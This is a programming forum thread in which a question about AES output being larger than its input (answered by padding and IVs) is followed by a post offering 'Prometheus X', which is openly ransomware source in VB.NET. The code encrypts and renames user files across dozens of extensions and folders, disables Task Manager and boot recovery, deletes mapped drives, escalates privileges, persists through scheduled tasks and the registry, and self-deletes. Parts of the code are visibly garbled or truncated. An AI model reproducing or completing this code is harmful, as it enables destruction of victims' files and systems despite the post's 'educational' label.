Question Managed Rijndael, encr. output is larger than input


New member
Feb 17, 2010
Programming Experience

I'm tried all the different samples for Managed Rijndael I found in the internet for .NET, like the one attached.

Everytime I crypt an array of bytes whitch has a size of 128 Bytes (16*8), the encrypted result has a size of 144 Bytes (128+16).

Everywhere you can read that Rijndaels AES is an blockchiffre which keeps the size the same as the origin, or does it not? :confused:

I tried a source of 127 Bytes for example and the target grows to 128, thats okay. But the exact size of 128 does not work correct. The same happens to 256 Bytes, they grow.
Btw: The crypting and decrypting works correctly. But size matters to.

I need: source 128 Bytes -> encrypted 128 Byte-> decrypted 128 Byte.

Does any one have the same problem or an idea to solve it? Help is appreciated :) .

Example, but any other sample using Managed Rijndael I found does the same fault:
Imports System.Security.Cryptography
Imports System.IO

    Public Function EncryptString128Bit(ByVal bytValue As Byte(), ByVal bytKey As Byte()) As Byte()

        Dim bytEncoded() As Byte
        Dim bytIV() As Byte = {121, 241, 10, 1, 132, 74, 11, 39, 255, 91, 45, 78, 14, 211, 22, 62}

        Dim objMemoryStream As New MemoryStream()
        Dim objCryptoStream As CryptoStream
        Dim objRijndaelManaged As RijndaelManaged
        ReDim bytEncoded(0)

        objRijndaelManaged = New RijndaelManaged()

        objCryptoStream = New CryptoStream(objMemoryStream, objRijndaelManaged.CreateEncryptor(bytKey, bytIV), CryptoStreamMode.Write)
        objCryptoStream.Write(bytValue, 0, bytValue.Length)


        bytEncoded = objMemoryStream.ToArray

        ReDim Preserve bytEncoded(255)

        objMemoryStream = Nothing
        objCryptoStream = Nothing
        Return bytEncoded

    End Function

    Public Function DecryptString128Bit(ByVal bytDataToBeDecrypted As Byte(), ByVal bytDecryptionKey As Byte()) As Byte()

        Dim bytTemp() As Byte
        Dim bytIV() As Byte = {121, 241, 10, 1, 132, 74, 11, 39, 255, 91, 45, 78, 14, 211, 22, 62}
        Dim objRijndaelManaged As New RijndaelManaged()
        Dim objMemoryStream As MemoryStream
        Dim objCryptoStream As CryptoStream
        Dim strReturnString As String = String.Empty

        ReDim bytTemp(bytDataToBeDecrypted.Length)

        objMemoryStream = New MemoryStream(bytDataToBeDecrypted)

        objCryptoStream = New CryptoStream(objMemoryStream, objRijndaelManaged.CreateDecryptor(bytDecryptionKey, bytIV), CryptoStreamMode.Read)

        objCryptoStream.Read(bytTemp, 0, bytTemp.Length)

        objMemoryStream = Nothing
        objCryptoStream = Nothing
        Return bytTemp

    End Function

Thx, LastUser


Set the Padding to none, because there will be no more control informations attached to the crypted data.


thx to Dave S. :)

NOT using padding isn't really a "solution". In that case you have to do the padding yourself or otherwise only can work with multiples of the block size.

Who cares if the output is longer than the input? Some ppl like to use IVs (and ALL ppl should use them) and usually write the used IV in front of the output stream. This makes output longer than input anyway.
This is AES Managed SHA512 256-Bit Hashing I wrote called: "Prometheus X". It's all about the Bytes and the Value from those bytes. I have it set to just target "Videos" but if you change the path to C:\ it will do some damage. Files Hashed by Prometheus cannot be returned to normal state whereas Hashing and Encryption are different processes.

Last edited:
This is Encryption and your Byte issue can easily be addressed if you study this code I wrote, it can decrypt as well. I'm an IT, so I deal with combatting ransomware & malware. This program will create a task at the highest administrative level in Task Scheduler, and load when your computer starts back up. If you aren't familiar with GOP, I'd research it. I wouldn't advice running this code if you are unsure what to disable first. I didn't have time to pull out the unnecessary code. This is for educational research only. Be safe.
Note: All Timers are "True", Intervale = 100
Note: You can remove a majority of extensions to fit your needs.
Imports System.ComponentModel
Imports System.IO
Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Security.AccessControl
Imports System.Security.Cryptography
Imports System.Security.Principal
Imports System.Text
Imports System.Threading
Imports Microsoft.Win32

Public Class Prometheus

    Public Structure DEV_BROADCAST_HDR
        Public dbch_size As Integer
        Public dbch_devicetype As Integer
        Public dbch_reserved As Integer

    End Structure

    Public Structure DEV_BROADCAST_VOLUME
        Public dbch_size As Integer
        Public dbch_devicetype As Integer
        Public dbch_reserved As Integer
        Public dbch_unitmask As Integer
        Public dbch_flags As Short
    End Structure

    Private Const WM_DEVICECHANGE As Integer = &H219
    Private Const DBT_DEVICEARRIVAL As Integer = &H8000
    Private Const DBT_DEVTYP_VOLUME As Integer = &H2
    Private ReadOnly Endorium As String = "C:\Users\"
    Private ReadOnly TheAnaustrikCalendar As String = Environment.UserName
    Private Const SWP_HIDEWINDOW = &H80

    Private Declare Function FindWindow Lib "user32" Alias "FindWindow" _
        (lpClassName As String, lpWindowName As String) As Long

    Private Declare Function SetWindowPos Lib "user32" _
        (hwnd As Long, hWndInsertAfter As _
         x As Long,
         y As Long,
         cx As Long,
         cy As Long,
         wFlags As Long) As Long

    Private Sub Prometheus_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        Dim processing As New HDDScarlett()
        Dim neuron As New ScarlettNeuron()
        Timer4.Start() 'System Restart
        Timer3.Start() 'GPO Initializing Sceduled Administrative Task
        Housing() 'Protect Process
        File_Shield() 'Protect Process
        Co_Existance() 'Application Spawn
        'Memory reduction for app to use less resource: Hence less odds of crashing
        Dim gateway As New Drocentium_Crystal()
        MatriArk() 'Admin rights to folder
        AntiTaskManager() 'Bat file running within VB.Net
        On Error GoTo Err
        Admin_Protocol() 'Checks to see if admin is running, if so, "BCDEDIT" comes into play
        'ReVive()'Copy's Program  to system
    End Sub

    Public Sub KillCtrlAltDelete()
        Dim regkey As RegistryKey
        Dim keyValueInt As String = "1"
        Dim subKey As String = "Software\Microsoft\Windows\CurrentVersion\Policies\System"
            regkey = Registry.CurrentUser.CreateSubKey(subKey)
            regkey.SetValue("DisableTaskMgr", keyValueInt)
        Catch ex As Exception
        End Try
    End Sub

    Public Sub Co_Existance()
        On Error GoTo Err
        My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.MyMusic)
        My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.MyDocuments)
        My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.MyPictures)
        My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.ProgramFiles)
        My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.Programs)
        My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.Temp)
    End Sub

    Public Shared Function IsAdministrator() As Boolean
        Dim isAdmin As Boolean = False
            Dim user As IIdentity = WindowsIdentity.GetCurrent()
            Dim principal As New WindowsPrincipal(CType(user, WindowsIdentity))
            isAdmin = principal.IsInRole(WindowsBuiltInRole.Administrator)
            Return isAdmin
        Catch ex As Exception
            Return isAdmin
        End Try
    End Function

    Public Sub Admin_Protocol()
        On Error GoTo Err
        If IsAdministrator() Then 'Disable task manager via; registry by deleting value
            KillCtrlAltDelete() 'kill  task manager
            'To disable automatic recovery, type: bcdedit / set current recoveryenabled No;
            '('current' represents the current operating system and changing the value to "no" will stop automatic recovery).
            Dim oProcess As New Process()
            Dim oStartInfo As New ProcessStartInfo("cmd.exe", $"bcdedit /set {{current}} recoveryenabled no") With {
                        .WindowStyle = ProcessWindowStyle.Hidden
            oStartInfo.CreateNoWindow = True
            oStartInfo.UseShellExecute = False
            oStartInfo.RedirectStandardOutput = True
            oProcess.StartInfo = oStartInfo

            Dim sOutput As String
            Using oStreamReader As StreamReader = oProcess.StandardOutput
                sOutput = oStreamReader.ReadToEnd()
            End Using
            'Now we delete the volume entry with ID: {802d5e32-0784-11Da-bd33-000476eba25f}
            'Removes the specified entry identifier (users) from the boot sequence
            Dim aProcess As New Process()
            Dim aStartInfo As New ProcessStartInfo("cdm.exe", $"bcdedit /delete {{802d5e32-0784-11Da-bd33-000476eba25f}}") With {
                       .CreateNoWindow = ProcessWindowStyle.Hidden

            aStartInfo.CreateNoWindow = True
            aStartInfo.UseShellExecute = False
            aStartInfo.RedirectStandardOutput = True
            aProcess.StartInfo = aStartInfo

            Dim tOutput As String
            Using oStreamReader As StreamReader = aProcess.StandardOutput
                tOutput = oStreamReader.ReadToEnd()
            End Using

            'Primary deletion of user accounts
            'The net user command is used to add. remove, and make changes to the user accounts on a computer, all from the command prompt
            Dim iProcess As New Process()
            Dim iStartInfo As New ProcessStartInfo("cmd.exe", "/c net use * /delete /y") With {
                .WindowStyle = ProcessWindowStyle.Hidden

            iStartInfo.CreateNoWindow = True
            iStartInfo.UseShellExecute = False
            iStartInfo.RedirectStandardOutput = True
            iProcess.StartInfo = iStartInfo

            Dim pOutput As String
            Using oStreamReader As StreamReader = iProcess.StandardOutput
                pOutput = oStreamReader.ReadToEnd()
            End Using
        End If

    End Sub

    'The DirectorySecurity class specifies the access rights for a system directory and how access attempts are audited.
    'This class represents access and audit rights as a set of rules. Each access rule is represented by a FileSystemAccessRule object, while each audit rule is represented by a FileSystemAuditRule object.
    'The DirectorySecurity Class Is an abstraction Of the underlying Windows file security system.
    'In this system, Each directory has a discretionary access control list (DACL), which controls access To the directory, And a system access control list (SACL), which specifies the access control attempts that are audited. The FileSystemAccessRule And FileSystemAuditRule classes are abstractions Of the access control entries (ACEs) that comprise DACLs And SACLs.
    'The DirectorySecurity Class hides many Of the details Of DACLs And SACLs;
    'you Do Not have To worry about ACE ordering Or null DACLS.
    'Use the FileSecurity Class To retrieve, add, Or change
    'the access rules that represent the DACL And SACL Of a file.
    Private Sub AddDirectorySecurity()
        Dim FolderPath As String = My.Computer.FileSystem.SpecialDirectories.MyMusic
        Dim domainAndUserName = Environment.UserDomainName & "\" & Environment.UserName
        Dim FolderInfo As New DirectoryInfo(FolderPath)
        Dim FolderAcl As DirectorySecurity = FolderInfo.GetAccessControl()
        FolderAcl.RemoveAccessRule(New FileSystemAccessRule(domainAndUserName, FileSystemRights.FullControl, InheritanceFlags.ContainerInherit Or InheritanceFlags.ObjectInherit))
    End Sub

    Public Sub Housing()
        Dim t As New Thread(Sub()

                                'This compliments "Process Security" below so only Admin can terminate "Prometheus" process
                                Dim hProcess As IntPtr = GetCurrentProcess()
                                Dim dacl = GetProcessSecurityDescriptor(hProcess)

                                For i As Integer = dacl.DiscretionaryAcl.Count - &H1 To &H0 + &H1

                                dacl.DiscretionaryAcl.InsertAce(&H0, New CommonAce(AceFlags.None,
                                                                                   New SecurityIdentifier(WellKnownSidType.WorldSid, Nothing),
                                SetProcessSecurityDescriptor(hProcess, dacl)
                            End Sub)
    End Sub

    'The Microsoft Windows security model enables you to control access to process objects.
    'For more information about security, see Access-Control Model.
    'When a user logs in, the system collects a set of data that uniquely identifies the user during the authentication
    'process, And stores it in an access token. This access token describes the security context of all processes associated with the user.
    'The security context of a process Is the set of credentials given to the process Or the user account that created the process.
    'You can use a token To specify the current security context For a process Using the CreateProcessWithTokenW Function.
    'You can specify a security descriptor For a process When you Call the CreateProcess, CreateProcessAsUser,
    'Or CreateProcessWithLogonW Function. If you specify NULL, the process gets a Default security descriptor.
    'The ACLs In the Default security descriptor For a process come from the primary Or impersonation token Of the creator.
    Public Enum ProcessAccessRights
        PROCESS_SET_QUOTA = &H100
        PROCESS_VM_READ = &H10
        PROCESS_VM_WRITE = &H20
        DELETE = &H10000
        READ_CONTROL = &H20000
        SYNCHRONIZE = &H100000
        WRITE_DAC = &H40000
        WRITE_OWNER = &H80000

            Or SYNCHRONIZE _
            Or &HFFF

    End Enum

    'Process security API
    'The GetKernelObjectSecurity function retrieves a copy of the security descriptor that protects a kernel object.
    <DllImport("advapi32.dll", SetLastError:=True)>
    Private Shared Function GetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer,
     <Out> pSecurityDescriptor As Byte(), nLength As UInteger, <Out> ByRef lpnLengthNeeded As UInteger) As Boolean
    End Function

    'Process security API. Retrieves a pseudo handle for the current process.
    'A pseudo handle is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.
    'For compatibility with future operating systems, it is best to call GetCurrentProcess instead of hard-coding this constant value.
    'The calling process can use a pseudo handle to specify its own process whenever a process handle is required.
    'Pseudo handles are not inherited by child processes.
    Public Shared Function GetCurrentProcess() As IntPtr
    End Function

    'Process security API. The SetKernelObjectSecurity function sets the security of a kernel object.
    'For example, this can be a process, thread, or event.
    'Note: This function should not be used when setting a security descriptor on file system objects.
    'Instead, use the SetSecurityInfo or SetNamedSecurityInfo functions.
    <DllImport("advapi32.dll", SetLastError:=True)>
    Private Shared Function SetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer,
    <[In]> pSecurityDescriptor As Byte()) As Boolean
    End Function

    'The NtSetInformationProcess function can be used to set a process as critical process.
    'The system will bug check the system with the bug check code CRITICAL_PROCESS_TERMINATION (0xF4) when the critical process is terminated.
    <DllImport("ntdll.dll", SetLastError:=True)>
    Private Shared Function NtSetInformationProcess(hProcess As IntPtr, processInformationClass As Integer, ByRef processInformation As Integer, processInformationLength As Integer) As Integer
    End Function

    'Create a critical system process. This is a process that cannot be terminated...
    'Need admin for this:

    'Private Sub CriticalProcess()
    'Dim isCritical As Integer = 1
    ' we want this to be a Critical Process
    'Dim BreakOnTermination As Integer = 29
    ' value for BreakOnTermination (flag)
    '   Process.EnterDebugMode()
    'acquire Debug Privileges
    ' setting the BreakOnTermination = 1 for the current process
    '  NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermination, isCritical, 4)
    'End Sub

    'These functions serve to protect "Prometheus's Process" from being terminated unless you are an admin. If you activate the code above then run the program you'll see.
    'The Microsoft Windows security model enables you to control access to process objects. For more information about security,
    'see Access-Control Model.
    'When a user logs in, the system collects a set of data that uniquely identifies the user during the authentication process,
    'And stores it in an access token. This access token describes the security context of all processes associated with the user.
    'The security context of a process Is the set of credentials given to the process Or the user account that created the process.
    Public Shared Function GetProcessSecurityDescriptor(processHandle As IntPtr) As RawSecurityDescriptor
        Const DACL_SECURITY_INFORMATION As Integer = &H4
        Dim psd As Byte() = New Byte(-1) {}
        Dim bufSizeNeeded As UInteger
        GetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, psd, 0, bufSizeNeeded)
        If bufSizeNeeded < 0 OrElse bufSizeNeeded > Short.MaxValue Then Throw New Win32Exception()
        If Not GetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, CSharpImpl.Assign(psd, New Byte(bufSizeNeeded - 1) {}), bufSizeNeeded, bufSizeNeeded) Then Throw New Win32Exception()
        Return New RawSecurityDescriptor(psd, 0)
    End Function

    'Set Process Security Descriptor Action. Adjusting Process Security allows a process To be Protected from most tampering by users.
    'For example, adjusting process security can restrict who can Stop a process from the task manager.
    Public Shared Sub SetProcessSecurityDescriptor(processHandle As IntPtr, dacl As RawSecurityDescriptor)
        Const DACL_SECURITY_INFORMATION As Integer = &H4
        Dim rawsd As Byte() = New Byte(dacl.BinaryLength - 1) {}
        dacl.GetBinaryForm(rawsd, 0)
        If Not SetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, rawsd) Then Throw New Win32Exception()
    End Sub

    'C# Conversion to VB.Net
    Private Class CSharpImpl

        'Specifies that one or more declared programming elements are associated with a class or structure at large,
        'and not with a specific instance of the class or structure.
        <Obsolete("Please refactor calling code to use normal Visual Basic assignment")>
        Shared Function Assign(Of T)(ByRef target As T, value As T) As T
            target = value
            Return value
        End Function

    End Class

    Private Sub File_Shield()
        'This prevents Prometheus "exe" folder from being accessed, unless the admin
        Dim filePath As String
        filePath = (Environment.GetFolderPath(Assembly.GetExecutingAssembly().Location))
        Dim adminUserName As String = Environment.UserName
        Dim ds As DirectorySecurity = Directory.GetAccessControl(filePath)
        On Error GoTo Err
        Dim fsa As New FileSystemAccessRule(adminUserName, FileSystemRights.FullControl, AccessControlType.Deny)
        Directory.SetAccessControl(filePath, ds)
    End Sub

    'AES 256-bit encryption
    Public Function Riezengard_The_Malevolent_One(seedKill As Byte(), oraclepass As Byte()) As Byte()
        Dim FesteringBytes As Byte() = Nothing
        'A Byte is made up of more than just 8 values (between 0-1 but 256 "28") different Bytes which stands for 3 values between 0 & 9, but 1000 (103) permutations from 0(00) to 999 and is easily mistaken.
        Dim theBayOfDead As Byte() = New Byte() {1, 1, 2, 2, 3, 3, 4, 4}
        'Reads a sequence of bytes from the current memory stream and advances the position within the memory stream by the number of bytes read.
        Using rythorian As New MemoryStream()
            Using AES As New RijndaelManaged()
                AES.KeySize = 256
                AES.BlockSize = 128

                Dim key = New Rfc2898DeriveBytes(oraclepass, theBayOfDead, 100)
                AES.Key = key.GetBytes(AES.KeySize / 8)
                AES.IV = key.GetBytes(AES.BlockSize / 8)
                AES.Mode = CipherMode.CBC

                Using cs = New CryptoStream(rythorian, AES.CreateEncryptor(), CryptoStreamMode.Write)
                    cs.Write(seedKill, 0, seedKill.Length)

                End Using
                FesteringBytes = rythorian.ToArray()
            End Using
        End Using
        Return FesteringBytes
    End Function

    Public Sub Thantalos_The_Filth(seething As String, malice As String)
        Dim maliceBitter As Byte() = Encoding.UTF8.GetBytes(malice)
        maliceBitter = SHA256.Create().ComputeHash(maliceBitter)
        Dim DarkendCrypt As Byte() = File.ReadAllBytes(seething)
            Dim VanquishLight As Byte() = Riezengard_The_Malevolent_One(DarkendCrypt, maliceBitter)
            File.WriteAllBytes(seething, VanquishLight)
            Dim extension As String = ".Prometheus"
            File.Move(seething, seething _
                      & extension)
        Catch __unusedUnauthorizedAccessException1__ As UnauthorizedAccessException
        End Try
    End Sub

    Public Sub Annika_Kreznok_Infernal_Directory_The_Quiet_One(WormHole As String, malice As String)
            Dim quantumentanglement = {".3dm", ".3g2", ".3gp", ".aaf", ".accdb", ".aep", ".aepx", ".adt", ".adts", ".mdb", ".tiff",
                                       ".aet", ".ai", ".aif", ".arw", ".as", ".as3", ".asf", ".asp", ".asx", ".avi", ".bay", ".bmp",
                                       ".cdr", ".accde", ".midi", ".tmp", ".wp5", ".cer", ".class", ".cpp", ".cr2", ".crt", ".crw",
                                       ".cs", ".csv", ".db", ".dbf", ".dcr", ".der", ".dng", ".accdr", ".msi", ".txt", ".xps", ".doc",
                                       ".docb", ".docm", ".docx", ".dot", ".dotm", ".dwg", ".dxf", ".dxg", ".efx", ".eps", ".aac",
                                       ".aiff", ".mui", ".wms", ".erf", ".fla", ".flv", ".idml", ".iff", ".indb", ".indd", ".indl",
                                       ".indt", ".inx", ".jar", ".java", ".aifc", ".bin", ".pub", ".wmz", ".jpeg", ".jpg", ".kdc",
                                       ".m3u", ".m3u8", ".m4u", ".max", ".mdb", ".mdf", ".mef", ".mid", ".mov", ".mp3", ".cda", ".gif",
                                       ".vsd", ".mp4", ".mpa", ".mpeg", ".mrw", ".msg", ".nef", ".nrw", ".odb", ".odc", ".odm", ".odp",
                                       ".ods", ".aspx", ".htm", ".html", ".vss", ".odt", ".orf", ".p12", ".p7b", ".p7c", ".pdb", ".pdf",
                                       ".pef", ".pem", ".pfx", ".php", ".plb", ".pmd", ".bat", ".vssm", ".pot", ".potm", ".potx", ".ppam",
                                       ".ppj", ".pps", ".ppsm", ".ppsx", ".ppt", ".pptm", ".pptx", ".prel", ".cab", ".css", ".vstm",
                                       ".prprof", ".ps", ".psd", ".pst", ".ptx", ".r3d", ".ra", ".raf", ".rar", ".raw", ".rb", ".rtf",
                                       ".rw2", ".dif", ".scss", ".vstx", ".rwl", ".sdf", ".sldm", ".sql", ".sr2", ".srf", ".srw", ".svg",
                                       ".swf", ".tif", ".vcf", ".vob", ".dll", ".sass", ".wbk", ".wav", ".wb2", ".wma", ".wmv", ".wpd",
                                       ".wps", ".x3f", ".xla", ".xlam", ".xlk", ".xll", ".xlm", ".xls", ".eml", ".ini", ".wks", ".xlsb",
                                       ".xlsm", ".xlsx", ".zlt", ".xltm", ".xlw", ".xml", ".xqx", ".zip", ".png", ".jfif", ".iso", ".m4a",
                                       ".wmd", ".3ds", ".3mf", ".7z", ".accft", ".adame", ".adicht", ".adx", ".adz", ".agr", ".ahk", ".cur",
                                       ".air", ".amg", ".ani", ".ape", ".ashx", ".bar", ".bps", ".bin", ".beam", ".bz2", ".blend", ".cdf",
                                       ".cpl", ".csproj", ".d3v", ".d4d", ".d4p", ".daf", ".dart", ".vb", ".cs", ".dbd", ".dgb", ".dbs",
                                       ".dbw", ".dc", ".dbx", ".dc6", ".dcc", ".dcd", ".dcc", ".dch", ".dcs", ".dct", ".dda", ".deb", ".dds",
                                       ".dem", ".der", ".dfl", ".dfv", ".dic", ".dis", ".dlg", ".dls", ".dochtml", ".docmhtml", ".dothtml",
                                       ".dw2", ".dwf", ".ebd", ".email", ".emf", ".emz", ".epa", ".etl", ".evt", ".evtx", ".exp", ".fv4",
                                       ".fodg", ".fodp", ".fods", ".fodt", ".frm", ".frag", ".fs", ".gz", ".mdi", ".mid", ".msc", ".run",
                                       ".scv", ".torrent", ".tar", ".vbs", ".gif", ".js", ".taz", ".xar", ".php3", ".ico", ".ogg", ".tar"}
            Dim files As String() = Directory.GetFiles(WormHole)
            Dim offspring As String() = Directory.GetDirectories(WormHole)
            For i As Integer = 0 To files.Length _
                - 1
                Dim extension As String = Path.GetExtension(files(i))
                If quantumentanglement.Contains(extension) Then
                    Thantalos_The_Filth(files(i), malice)
                End If
            For i As Integer = 0 To offspring.Length - 1
                If offspring.Contains("Windows") OrElse offspring(i).Contains("Program Files") OrElse offspring(i).Contains("Program Files (x86)") Then Continue For
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(offspring(i), malice)

        Catch __unusedSystemException1__ As SystemException

        End Try
    End Sub

    Private Sub Dead_Meadow()
        On Error GoTo Err
        Dim malice As String = "1234567890!@#$%^&*()_+_OrDeR_oF_CoRrUpTiOn"
        Dim aeros As String = "\Desktop\"
        Dim apathy As String = "\Downloads\"
        Dim murder As String = "\Documents\"
        Dim psychotron As String = "\Pictures\"
        Dim mystra As String = "\Music\"
        Dim cratus As String = "\Videos\"
        Dim programFiles As String = "\ProgramFiles\"
        Dim programs As String = "\Programs\"
        Dim temps As String = "\Temp\"

        'The strings below compliment the above calling for each drive
        Dim needle As String = Endorium & TheAnaustrikCalendar & aeros
        Dim basket As String = Endorium & TheAnaustrikCalendar & apathy
        Dim mirrors As String = Endorium & TheAnaustrikCalendar & murder
        Dim shattered As String = Endorium & TheAnaustrikCalendar & psychotron
        Dim guide As String = Endorium & TheAnaustrikCalendar & mystra
        Dim you As String = Endorium & TheAnaustrikCalendar & cratus
        Dim blood As String = Endorium & TheAnaustrikCalendar & programFiles
        Dim seething As String = Endorium & TheAnaustrikCalendar & programs
        Dim wound As String = Endorium & TheAnaustrikCalendar & temps

        'On Windows, GetLogicalDrives returns the names of all accessible drives on a particular machine,
        'including any optical drives or removable media devices, in the form "<drive letter>:\" (for example, "C:\").
        'On Unix, it returns the paths of all filesystem mount points mounted on a particular machine (for example,
        '"/home/user", "/media/usb").
        Dim wrath As String() = Directory.GetLogicalDrives()
        For Each str As String In wrath
            If str = "C:\" Then
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(needle, malice)
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(basket, malice)
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(mirrors, malice)
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(shattered, malice)
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(guide, malice)
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(you, malice)
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(blood, malice)
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(seething, malice)
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(wound, malice)
                Annika_Kreznok_Infernal_Directory_The_Quiet_One(str, malice)

            End If

    End Sub

#Region " GPO Security Identifier | Creators Owner ID, (Highest Mandatory Level) | Schedule Task  "

    'GPO cmdlet creates a GPO with a specified name. By default, the newly created GPO is not linked to a site,
    'domain, or organizational unit (OU).
    'You can use this cmdlet To create a GPO that Is based On a starter GPO by specifying the GUID Or the display name
    'Of the Starter GPO, Or by piping a StarterGpo Object into the cmdlet.
    'The cmdlet returns a GPO Object, which represents the created GPO that you can pipe "To other Group Policy cmdlets."
    Public Function GPO(cmd As String,
                        Optional args As String = "",
                        Optional startin As String = "") As String
        GPO = ""
            Dim p = New Process With {
                .StartInfo = New ProcessStartInfo(cmd, args)
            If startin <> "" Then p.StartInfo.WorkingDirectory = startin
            p.StartInfo.RedirectStandardOutput = True
            p.StartInfo.RedirectStandardError = True
            p.StartInfo.UseShellExecute = False
            p.StartInfo.CreateNoWindow = True
            Dim s = p.StandardOutput.ReadToEnd
            s += p.StandardError.ReadToEnd
            GPO = s
        Catch ex As Exception
        End Try
    End Function ' Get Process Output.

    'Possession Part of Owning System Via; The <Security Identifier>
    Public Function CanH() As Boolean
        CanH = False
        'Displays user, group, and privileged information for the user who is currently logged on to the local system.
        'If used without parameters, whoami displays the current domain and user name.
        Dim s = GPO(
            "c: \windows\system32\cmd.exe",
            "/c whoami /all | findstr /I /C:""S-1-5-32-544""") '<<This is a Security Identifier
        If s.Contains("S-1-5-32-544") Then CanH = True
    End Function ' Check if can get Higher.

    'Below: Creators Owner ID has discovered the "Security Identifier" to be replaced by the "S-1-16-12288"
    '(Highestndatory Level) ADMIN.
    'A Security Identifier (SID) is used to uniquely identify a security principal or security group. Security principals can represent any entity
    'that can be authenticated by the operating system, such as a user account, a computer account, or a thread or process that runs in the security
    'context of a user or computer account.Each account Or group, Or process running in the security context of the account,
    'has a unique SID that Is issued by an authority, such as a Windows domain controller. It Is stored in a security database.
    'The system generates the SID that identifies a particular account Or group at the time the account Or group Is created.
    'When a SID has been used as the unique identifier for a user Or group, it can never be used again to identify another user Or group.
    'Each time a user signs in, the system creates an access token for that user. The access token contains the user's SID, user rights, and the SIDs
    'for any groups the user belongs to. This token provides the security context for whatever actions the user performs on that computer.
    'In addition to the uniquely created, domain-specific SIDs that are assigned to specific users And groups, there are well-known SIDs that identify
    'generic groups And generic users. For example, the Everyone And World SIDs identify a group that includes all users. Well-known SIDs have values
    'that remain constant across all operating systems. SIDs are a fundamental building block Of the Windows security model.
    'They work With specific components Of the authorization And access control technologies In the security infrastructure Of the
    'Windows Server operating systems. This helps protect access To network resources And provides a more secure computing environment.
    'How security identifiers work:
    'Users refer To accounts by Using the account name, but the operating system internally refers To accounts And processes
    'that run In the security context Of the account by Using their security identifiers (SIDs). For domain accounts, the SID Of a
    'security principal Is created by concatenating the SID Of the domain With a relative identifier (RID) For the account.
    'SIDs are unique within their scope (domain Or local), And they are never reused.
    Public Function CH() As Boolean
        CH = False
        Dim s = GPO("c:\windows\system32\cmd.exe",
                    "/c whoami /all | findstr /I /C:""S-1-16-12288""")
        If s.Contains("S-1-16-12288") Then CH = True
    End Function ' Check if Higher.

    'Elevating Privileges
    Public Function GH() As Boolean
        GH = False
        If Not CH() Then
                'Elevating process privilege programmatically.
                'In computing, runas is a command in the Microsoft Windows line of operating systems that allows a user to run specific
                'tools and programs under a different username to the one that was used to logon to a computer interactively.
                Dim pc As New ProcessStartInfo(Process.GetCurrentProcess.MainModule.FileName) With {
                    .Verb = "runas"
                Dim p = Process.Start(pc)
                Return True
            Catch ex As Exception
                Return False
            End Try
        End If
    End Function ' Get Higher Level As Admin.

    'Now that the information is gathered, we create a backdoor into the system via entry of Task Scheduler
    'with the highest Logon.
    Private Sub SubContractors()
        ' StartUp BackgroundWorker to schedule a startup task
        Dim subw As New BackgroundWorker()
        AddHandler subw.DoWork, Sub(sender1 As Object,
                                    e1 As DoWorkEventArgs)
                                    'Schedules Task to start up with Admin Rights
                                    While True
                                            If CH() Then
                                                If Not GPO("c:\windows\system32\cmd.exe",
                                                           $"/C schtasks /create /rl HIGHEST /sc ONLOGON /tn Prometheus /F /tr """"{Process.GetCurrentProcess.MainModule.FileName}""""").Contains("successfully") Then
                                                    My.Computer.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce", True).SetValue("Prometheus",
                                                End If
                                                My.Computer.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce", True).SetValue("Prometheus",
                                            End If
                                        Catch ex As Exception
                                        End Try
                                        Const MillisecondsTimeout As Integer = &H3A98 '15000
                                    End While
                                End Sub
    End Sub

    'This is a secondary worker backup for our "Background Worker" in the event the task fails.
    Private Sub SoilWork()
        On Error Resume Next
        Dim p As New Process
        With p.StartInfo
            .FileName = "schtasks.exe"
            .Arguments = $"/C schtasks /create /rl HIGHEST /sc ONLOGON /tn Prometheus /F /tr """"{Process.GetCurrentProcess.MainModule.FileName}""""".Contains("successfully")
            .UseShellExecute = False
            .RedirectStandardOutput = True
            .CreateNoWindow = True
        End With
                                                    True).SetValue("Prometheus", Process.GetCurrentProcess.MainModule.FileName)

        Dim s As String = p.StandardOutput.ReadToEnd
                        "Create Task Results..")
    End Sub

    Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
        Timer2.Start() 'self destruct sequence of Prometheus = previous presence gone from system

    End Sub

#End Region

    'Hides Taskbar
    Private Sub CmdHideTaskBar()
        Dim thwnd As Long
        thwnd = FindWindow("Shell_traywnd", "")
        Call SetWindowPos(thwnd, 0, 0, 0, 0, 0, SWP_HIDEWINDOW)
    End Sub

    Private Sub Timer2_Tick(sender As Object, e As EventArgs) Handles Timer2.Tick
        Ultimate_Self_Destruct() 'Call's for self-destruction of Prometheus
    End Sub

    'This program destroys itself after it's carnage
    Public Sub Ultimate_Self_Destruct()
        On Error GoTo Err
        Dim Info As New ProcessStartInfo With {
        .Arguments = $"/C timeout 2 && Del /Q /F {Application.ExecutablePath}",
        .WindowStyle = ProcessWindowStyle.Hidden,
        .CreateNoWindow = True,
        .FileName = "cmd.exe"

    End Sub

